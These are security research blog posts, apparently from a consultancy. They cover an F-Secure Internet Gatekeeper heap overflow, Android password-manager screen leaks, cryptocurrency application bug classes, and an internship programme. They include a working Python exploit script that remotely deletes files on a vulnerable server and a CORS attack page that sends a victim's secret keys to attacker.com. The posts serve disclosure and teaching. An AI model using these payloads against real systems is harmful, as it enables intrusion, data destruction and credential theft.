This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.
All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.
An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.
The original affected package has the following SHA256 hash:
1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26
Proceed with the installation:
yum install glibc.i686
rpm -i <fsigkbin>.rpm
Now you can use Ghidra/IDA or your favorite disassembler/decompiler to start reverse engineering Internet Gatekeeper!
As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.
F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.
The fact that it was written in C/C++ led us down the road of looking for memory corruption vulnerabilities, which are common in these languages.
It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron, which uses Radamsa as the underlying engine. Fuzzotron has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST request used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as a fuzzing seed.
When analyzing the input mutated by Radamsa, we could quickly see that the root cause of the vulnerability revolved around the Content-Length header. The generated test case that crashed the software had the following header value: Content-Length: 21487483844. This suggests an overflow due to incorrect integer math.
After running the test through gdb, we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This function is responsible for handling incoming connections and dispatching them to the relevant handlers depending on which HTTP verbs, paths, or cookies are used.
To demonstrate the issue, we're going to send a POST request with a very large Content-Length header value to port 9012, where the admin panel is running.
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844
AAAAAAAAAAAAAAAAAAAAAAAAAAA
The application will parse the request and execute the fs_httpd_get_header function to retrieve the content length. The value is then passed to the strtoul (String To Unsigned Long) function.
The following pseudo code provides a summary of the control flow:
content_len = fs_httpd_get_header(header_struct, "Content-Length");
if (content_len) {
    content_len_new = strtoul(content_len, 0, 10);
}
What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, whose largest possible value is 2^32-1 (on 32-bit systems).
The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).
As our provided Content-Length is too large for an unsigned long int, strtoul will return ULONG_MAX, which corresponds to 0xFFFFFFFF on 32-bit systems.
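This is easy to verify in isolation. Below is a minimal sketch (our own test harness, not Internet Gatekeeper code) that reproduces the saturation when compiled as a 32-bit binary (e.g. with gcc -m32):
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    errno = 0;
    /* 21487483844 does not fit in a 4-byte unsigned long, so strtoul()
       saturates to ULONG_MAX (0xFFFFFFFF) and sets errno to ERANGE. */
    unsigned long content_len = strtoul("21487483844", NULL, 10);
    printf("content_len = %lu, ULONG_MAX = %lu, ERANGE: %d\n",
           content_len, ULONG_MAX, errno == ERANGE);
    return 0;
}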
So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to content_len_new and then calls malloc.
This can be seen in the following pseudo code:
// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)
This causes a problem, as 0xFFFFFFFF + 1 triggers an integer overflow that results in 0x00000000. The malloc call will therefore allocate 0 bytes of memory.
malloc does allow invocations with an argument of 0 bytes. When malloc(0) is called, a valid pointer to the heap is returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can also be read in the man pages:
The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().
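Putting the two behaviors together: the following sketch (again ours, not the vendor's code) models the 32-bit arithmetic with uint32_t, so the wrap-around is reproducible on any host:
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    uint32_t content_len = 0xFFFFFFFF;      /* what strtoul() returned */
    uint32_t alloc_size = content_len + 1;  /* integer overflow: wraps to 0 */
    void *buf = malloc(alloc_size);         /* malloc(0): small but valid chunk */
    printf("alloc_size = %u, buf = %p\n", alloc_size, buf);
    free(buf);
    return 0;
}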
If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read:
// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if (content_len_new) {
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new);
}
During the overflow, this code will read an arbitrary amount of data onto the heap, without any restraints. For exploitation, this is a great primitive: we can stop writing bytes to the HTTP stream and the software will simply close the connection and continue. Under these circumstances, we have complete control over how many bytes we write.
In summary, we can leverage malloc's chunks of size 0x10 together with an overflow of arbitrary data to overwrite existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then spraying the heap with the full path of the file we want to delete. Internet Gatekeeper's internal handler has a decontruct_http method which looks for this flag and removes the file. By leveraging this primitive, an attacker gains arbitrary file removal, which is sufficient to demonstrate the severity of the issue.
from pwn import *
import time
import sys

def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r

def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12              # Padding
    payload += p32(0x1d)             # Fast bin chunk overwrite
    payload += "A" * 488             # Padding
    payload += p32(0xdda00771)       # Address of payload
    payload += p32(0xdda00771 + 4)   # Junk
    r = send_payload(payload)

def massage_heap(filename):
    print "Trying to massage the heap....."
    for x in xrange(100):
        payload = ""
        payload += p32(0x0)          # Needed to bypass checks
        payload += p32(0x0)          # Needed to bypass checks
        payload += p32(0xdda0077d)   # Points to where the filename will be in memory
        payload += filename + "\x00"
        payload += "C" * (0x300 - len(payload))
        r = send_payload(payload, content_len=0x80000, nofun=True)
        r.close()
    cut_conn = True
    print "Heap massage done"

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()

    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
Current exploit reliability is around 60-70% of attempts, and our PoC relies on the specific environment listed in the prerequisites.
Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to info@doyensec.com ;)
This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.
“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler
At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.
Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.
The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.
Day one is important. Interns will be responsible for setting up their Doyensec-provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as a mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide all the equipment necessary to perform the work. Most importantly, they will learn about our values and the things we consider crucial for delivering high-quality work.
While the internship is considered full time over the course of 2-3 months, we have had interns who were still studying and wanted to combine work and school. We take pride in having a flexible company culture oriented around results, and our approach to the internship is no different.
“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval
Work days are generally grouped into two categories:
a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.
b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.
Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:
What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to a non-technical audience and manage projects with strict deadlines.”
Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”
Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”
The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either the US or Europe.
What do we offer, and who is our perfect candidate? In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.
Do you want to join Doyensec as an intern? Apply via our careers portal!
A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn't confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).
The FLAG_SECURE setting was initially introduced as an additional setting to WindowManager.LayoutParams to prevent DRM-protected content from appearing in screenshots, video screencaps, or from being viewed on “non-secure displays”. This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way, Google forestalled the piracy-apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.
While FLAG_SECURE nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, YouTube Red), over the years developers have mistaken this “secure” flag for an easy catch-all security feature provided by Android to exempt an entire app from screen capture or recording. Unfortunately, this functionality is not global for the entire app, but can only be set on specific screens that contain sensitive data. To make matters worse, Android fragments used in the application will not respect the FLAG_SECURE set for the activity and won't pass down the flag to any other Window instances created on behalf of that activity. As a consequence, several native UI components like Spinner, Toast, Dialog, PopupWindow, and many others will still leak their content to third-party applications having the right permissions.
After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application (mnml) and started poking around.
After a few days of testing, every Android password manager examined (four in total) was found to be vulnerable to some extent.
The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.
In 1Password, the Account Settings section offers a way to manage 1Password accounts. One of its features is “Large Type”, which allows showing an account's Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks it to third-party applications installed on the victim's device. The Secret Key is combined with the user's Master Password to create the full encryption key used to encrypt the account data, protecting it on the server side.
This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.
When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. But if the user reveals the cleartext password with the “Eye” icon, the toast will also contain the cleartext password. The toast fragment showing the copied password leaks it to third-party applications.
This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.
Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameters of the “safe” passwords is visible to third-party applications on the victim's device.
Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE flag, resulting in its leak.
The issue was fixed in Dashlane for Android in version 6.1929.2.
Several scenarios could result in an app installed on a user's phone recording their activity.
If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.
Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.
As always, this research was possible thanks to my 25% research time at Doyensec!
In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchange web interfaces, custody systems, and backbone infrastructure components.
We have seen many things done right, but we have also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to creating better systems.
In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.
Breaking Crypto Currency Systems != Breaking Crypto (at least not always)
For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.
This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.
Cross-Origin Resource Sharing (CORS) is used to relax the Same-Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS policy can have a great impact on a website's security posture, as other sites might be able to access the page content.
Imagine a website with the following HTTP response headers:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag with a sandbox attribute:
<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();
function callback() {
location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>
</html>
When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve the victim's secret keys.
This can also happen when the Access-Control-Allow-Origin response header is dynamically set to the same domain as specified by the Origin request header.
To prevent this vulnerability, make sure that:
- Access-Control-Allow-Origin is never set to null
- Access-Control-Allow-Origin is not taken from a user-controlled variable or header
- You are not reflecting the Origin HTTP header into Access-Control-Allow-Origin
In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors; however, there is a specific class of idiosyncrasies that can have devastating effects.
Let’s consider this Python code as an example:
# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])
At first sight, there is nothing wrong with this code. Yet there is actually a quite severe bug. The problem is that Python runs with __debug__ enabled by default, which allows assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (*.pyo files) and lands in production, all asserts are gone. As a result, the application will not enforce any security checks.
Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Clojure, and many more.
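As an illustration, C's standard assert macro is compiled out whenever NDEBUG is defined, a flag commonly set for release builds. A minimal sketch (the withdraw function and values are made up for illustration):
#include <assert.h>
#include <stdio.h>

/* Illustrative only: an assert used as a security check. */
long withdraw(long balance, long amount) {
    assert(amount > 0 && amount <= balance);  /* compiled out with -DNDEBUG */
    return balance - amount;
}

int main(void) {
    /* With asserts enabled this call aborts; built with -DNDEBUG it
       silently "succeeds" and prints 300. */
    printf("%ld\n", withdraw(200, -100));
    return 0;
}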
Swift behaves similarly; consider the following code:
// Without optimization, this asserts when the password is incorrect
if (password != "mysecretpw") {
    assertionFailure("Password not correct!")
}
If you were to run this code in Xcode, it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles the application without any optimizations, using the -Onone flag. If you were to build the same code for the App Store instead, the check would be optimized out, leading to no password check at all, since execution simply continues. Note that there are many things wrong in those three lines of code.
Talking about assertions, PHP takes first place and de facto facilitates RCE when you run asserts with a string argument, since the argument gets evaluated through the standard eval. For this reason, never use assert statements for guarding code or enforcing security checks.

A bug class that is also easy to overlook in fintech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.
For example, let's consider a withdrawal function that checks the available balance of a certain wallet. Being able to pass a negative amount could be abused to generate money for that account.
Imagine the following example code:
if data["wallet"].balance < data["amount"]:
error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...
data["wallet"].balance = data["wallet"].balance - data["amount"]
The if statement correctly checks whether the balance is higher than the requested amount; however, the code does not enforce that the amount is a positive number. Let's try a withdrawal of -100 coins from a wallet account holding 200 coins.
The check would be satisfied and the code responsible for updating the amount would look like the following:
data["wallet"].balance = 200 - (-100) # 300 coins
This would enable an attacker to get free money out of the system.
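The fix is to validate the sign of the amount before touching the balance. A minimal sketch in C (names are illustrative, not from any audited codebase):
#include <stdbool.h>
#include <stdio.h>

/* Reject negative, zero, and excessive amounts before updating the balance. */
bool withdraw(long *balance, long amount) {
    if (amount <= 0 || amount > *balance) {
        return false;
    }
    *balance -= amount;
    return true;
}

int main(void) {
    long balance = 200;
    bool ok = withdraw(&balance, -100);
    printf("ok = %d, balance = %ld\n", ok, balance);  /* ok = 0, balance = 200 */
    return 0;
}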
Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed vs. unsigned types come into play. In most architectures, a signed short integer is a 2-byte type that can hold both negative and positive numbers. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002, and so forth, while negative numbers are represented as two's complement: -1 == 0xffff, -2 == 0xfffe, and so forth. These representations meet at 0x7fff, which enables a signed short to hold a value between -32768 and 32767.
Let’s take a look at an example with pseudo-code:
signed short int bank_account = -30000
Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:
void withdraw(signed short int money) {
    bank_account -= money;
}
As we know, the maximum negative value is -32768, so the account can go only 2768 further into debt. What happens if a user withdraws 2768 + 1?
withdraw(2769); //32767
Yes! No longer in debt, thanks to integer wrapping. The current balance is now 32767.
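The pseudo-code above can be turned into a compilable demo. Note that storing -32769 into a 16-bit short is implementation-defined in C, but it wraps as shown on typical two's-complement platforms:
#include <stdio.h>

signed short int bank_account = -30000;

void withdraw(signed short int money) {
    /* The subtraction happens in int; converting -32769 back to a
       16-bit short wraps to 32767 on common platforms. */
    bank_account -= money;
}

int main(void) {
    withdraw(2769);
    printf("bank_account = %d\n", bank_account);  /* prints 32767 */
    return 0;
}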
Make sure the appropriate signed vs. unsigned types are used consistently across the entire codebase, and keep in mind that signed integer overflow is undefined behavior in C/C++.

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue, present in the password reset mechanism of many web platforms.
A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.
Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.
But what actually happens when the user clicks the link?
When a web browser requests a resource, it typically adds an HTTP header called the Referer header, indicating the URL of the resource from which the request originated. Even when the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon for password reset pages to load external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will also be sent to the third-party domains.
GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close
As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.
The Referer header should always be removed using one of the following techniques:
- data: or javascript: URIs
- <iframe src=about:blank>
- <meta name="referrer" content="no-referrer" />
- The Referrer-Policy header, assuming your application supports recent browsers only

If you would like to talk about securing your platform, contact us at info@doyensec.com!